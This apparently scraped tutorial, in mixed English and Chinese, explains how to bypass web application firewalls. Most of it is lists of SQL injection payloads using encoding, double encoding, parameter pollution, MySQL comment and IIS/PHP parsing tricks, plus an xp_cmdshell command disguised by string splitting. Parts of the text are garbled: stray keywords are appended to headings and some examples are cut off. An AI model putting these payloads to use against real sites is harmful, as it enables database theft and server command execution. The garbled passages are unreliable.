1. What is Firewall 2. Detecting the WAF 3. Different Types of Encoding Bypass 4. Bypass本質
1. What is Firewallhtml
Firewall is a security system which controls the traffic between a Network, Server or an Application. There are both Software and Hardware firewalls.
Common Type of Firewallsmysql
1. Network Layer Firewall 1) 4層二進制流特徵IPS 2) 5元祖端口防火牆 2. Web Application Firewall
Relevant Link:web
2. Detecting the WAFsql
There are many tools and scripts which can detect and fingerprint WAF presence over an Application, which includes but not limited to數據庫
1. NMAP nmap -p80 --script http-waf-detect <host> nmap -p80 --script http-waf-fingerprint <host> 2. wafw00f <url> 3. Checking the response headers 4. Checking Response Body etc
once you know the WAF you are dealing with, you can search for its available Bypass.apache
3. Different Types of Encoding Bypassapp
所謂的BYPASS WAF其實是去尋找位於WAF設備以後處理應用層數據包的硬件/軟件的特性。利用特性構造WAF不能命中,可是在應用程序可以執行成功的載荷,繞過防禦
There are many types of encodingide
1. some of them are supported by the Application Server 2. Some of them are supported by the Web App 3. some of them are supported by the Database Serve
When we send a request it goes through many Layers and Different types of Application before our input reach the database, which is why many times we are able to use different types of encodings and double encoding which are not supported by database server but the other applications in between, which may decode our input and pass it to the database server. Sometimes taking advantage of such behaviour helps us to bypass WAF.函數
WAF Bypass的核心思想是找到輸入數據在穿過WEB系統的不一樣層次子系統時的會產生不一樣的解釋(即被以不一樣的方式解碼)場景,繞過Bypass經常發生在不一樣的防護系統對同一份數據產生不一樣的理解,則防護方(WAF)的防護規則雖然匹配失敗,可是這份數據卻在WAF後方的子系統(例如WEB應用)中解釋成功,併產生攻擊
In this manner there are many different types of encodings which we can use to bypass WAF for example
1. URL Encoding 2. Hexing 3. Binary 4. Unicode etc.
First of all we will start with bypassing the test condition rules which many WAFs are blocking these days like:
Blocked True Conditions 1 or 1=1 1' or ''=' 1" or ""=" 1' or true# 1" or true# 1 or true# etc.
Now Lets Mix Up some common sense and encodings to bypass such filters:
or '1 || '1 null' || 'a'=_binary'a 1' || 'a'=x'61 1' && '0'=x'30 1' %26%26 %270%27%3dx'30 2' && 0.e1=_binary"0 1 or 1.e1=0b1010 ' || 1 like 1 '-' "-" ' || 2 not like 1 110 or x'30'=48 '1'!=20 1 or 20!='1' 2 and 2>0 3 || 0<1 12 || 0b1010<0b1011 0b11 || 0b1010x'30' 1 or 0b1 2121/**/||21 111' or _binary'1 1 or 2121 1' or 12 rlike '1
0x1: URL encoding
As we know SQL do not support URL encoding but Webserver and Apllication do. So we can also use URL encoding to bypass WAF. The first thing is to understand how is works. Some times when a Network Based Firewall is implemented or even in case of a Application firewall this could happen that the WAF is not docoding our input while comparing with the rule set. When our input reach to the server or the application then it is decoded, and then it is passed to the database server. In this manner URL encoding also helps us Bypassing waf many times.
%55nion(%53elect) union%20distinct%20select union%20%64istinctRO%57%20select union%2053elect %23?%0auion%20?%23?%0aselect %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect %55nion %53eLEct u%6eion se%6cect unio%6e %73elect unio%6e%20%64istinc%74%20%73elect uni%6fn distinct%52OW s%65lect %75%6e%6f%69%6e %61%6c%6c %73%65%6c%65%63%74
(Blocked) union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23 URL Encoded Bypass unio%6e selec%74 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%23 Example (Blocked) 1,2,3,4,5,6,7,8,9,10,11,12) URL Encoded Bypass
0x2: HEX/Binary Encode
Normal Hex (Blocked) select 0x313131 Hexed Bypass Version select x'313131'; Binary Bypass select 0b011110100110010101101110; Bypass using functions select unhex(x'333133313331');
Link'UnION distinctrow Select 11-- - hex編碼'UnION distinctrow Select 0x2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723-- -- 另外一種hex編碼'UnION distinctrow Select x'2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723'-- - binary編碼'UnION distinctrow Select 0b0010111000110001001010010010100101010101011011100100100101001111011011100010000001010011011001010110110001100101011000110111010000100000001100010010110000110010001011000011001100101100001101000010110000110101001011000011011000101100001101110010110000111000001011000011100100101100001100010011000000101100001100010011000100101100001100010011001000101100001100010011001100101100001100010011010000101100001100010011010100101100001100010011011000101100001100010011011100100011-- - 利用db function進行編碼'UnION distinctrow Select unhex('2e312929556e494f6e2053656c65637420312c322c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c313723')-- -
0x3: Double Encoding to bypass WAF
As we discussed before there are many applications playing role to pass your input from your browser to the database. This trick is based on exploiting this behaviour when our input gets decoded two times before it reach the database. As we know that web server do the basic URL decoding as it pass the Input parameters to the Web Application. But what if the developer again did the decoding? well yeah there are many times developer URL decode the input before using
Example WAF (Blocked) union select 1111,1222,1333&premflag=&searchcat=buy Bypassed With Double URL Encoding,1222,1333&premflag=&searchcat=buy
0x4: Bypassing Case sensitive Filters
As we discussed earlier about the ruleset defined by WAF, if you know some basics of REGEX then there is no need to tell you the different between:
/union.*select/ and /union.*select/i
0x5: HTTP Parameter Pollution
May be many of you have heard of it but am sure few would have ever used it. First of all what is HPP, Definition at OWASP - Supplying multiple HTTP parameters with the same name may cause an application to interpret values in unanticipated ways. By exploiting these effects, an attacker may be able to bypass input validation, trigger application errors or modify internal variables values. As HTTP Parameter Pollution (in short HPP) affects a building block of all web technologies, server and client side attacks exist.
Now as you have seen in the above image that ASP.NET add all the instances of the variables passed in the URL to comma separated values. We ll use it now for some basic bypass methods.
Example WAF (Blocked)'union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'web.config',20,21-- HPP'union--+&uid=*/%0aselect 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,'web.config',20,21-- HPP for Comma Filtered WAF'union--+&uid=*/%0aselect 1&uid=2&uid=3&uid=4&uid=5&uid=6&uid=7&uid=8&uid=9&uid=10&uid=11&uid=12&uid=13&uid=14&uid=15&uid=16&uid=17&uid=18&uid='web.config'&uid=20&uid=21--
0x6: 參數混淆污染
1. 註釋混淆 union select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 2. mysql特殊支持註釋語法混淆,50000表示假如 數據庫版本是5.00.00以上版本,註釋裏面的SQL語句纔會執行,是一種條件判斷執行語句'/*!50000UNION*//*!50000SELECT*/1,2,3,4,5,6,7-- -
0x7: unicode編碼繞過
1. %u0061nd user=0 2. %u0061nd user in (0) 3. %u0061nd user between 1 and 3
利用的是unicode在iis解析以後會被轉換成multibyte,可是轉換的過程當中可能出現: 多個widechar會有可能轉換爲同一個字符
s%u0065lect -> select s%u00f0lect -> select
0x8: Mysql特殊語法支持
1. 函數名經過`包裹: select`version`() 2. 空格替代符 1) select{x version()}from{x user}; 2) select{x(name)}from{x(manager)}; 3) select(host)from(mysql.user); 3. 邏輯運算符替代 1) and -> && 2) or -> ||
0x9: 字符串鏈接、關鍵詞拆分;EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell "whoami"')'%20or%20'ab'='a'%20'b
0x10: 用空null代替數字0
1. '=0# 2. '>-1# //由於0>-1,這一句也能成功 3. '=0=1# //Comparison operation 0=1 will be 0, the following operation result is true because of id=''=0(0=1). 比較操做「0=1」的結果將會是0,又由於id=''=0,因此如下的操做結果是真 4. '<=>0# //使用一些比較動做能使得兩邊的值相等 '=0=1=1=1=1=1# '=1<>1# '<>1# 1'<>99999# '!=2!=3!=4#
Relevant Link:
0x11: 非標準HTTP協議包參數注入
0x12: PHP+Apache畸形的boundary
Php在解析multipart data的時候有本身的特性,對於boundary的識別,只取了逗號前面的內容,例如咱們設置的boundary爲----aaaa,123456,php解析的時候只識別了----aaaa,後面的內容均沒有識別
0x13: 非規範GET/POST HTTP數據包
0x14: IIS系列非規範URLENCODE編碼繞過
黑客能夠將select編碼爲sel%e%ct,傳統waf對SEL%E%CT進行url解碼後變成SEL%E%CT 匹配select失敗,而進入asp.dll對SEL%E%CT進行url解碼卻變成select。IIS下的asp.dll文件在對asp文件後參數串進行url解碼時,會直接過濾掉09-0d(09是tab鍵,0d是回車)、20(空格)、%(下兩個字符有一個不是十六進制)字符,致使繞過
Relevant Link:
4. Bypass本質
1. 兼容舊的HTTP協議,從而致使攻擊者能夠構造一些"特殊的編碼"或"HTTP包",WEB容器須要對這些狀況進行兼容,而若是WAF沒法理解或理解錯誤,就產生了Bypass 2. HTTP要求sender/receiver之間須要理解MIME格式的各類轉換編碼,攻擊者能夠構造出一些通過特殊編碼的、且同時能讓WEB容器理解的HTTP請求包,而若是WAF沒法理解或理解錯誤,就產生了Bypass
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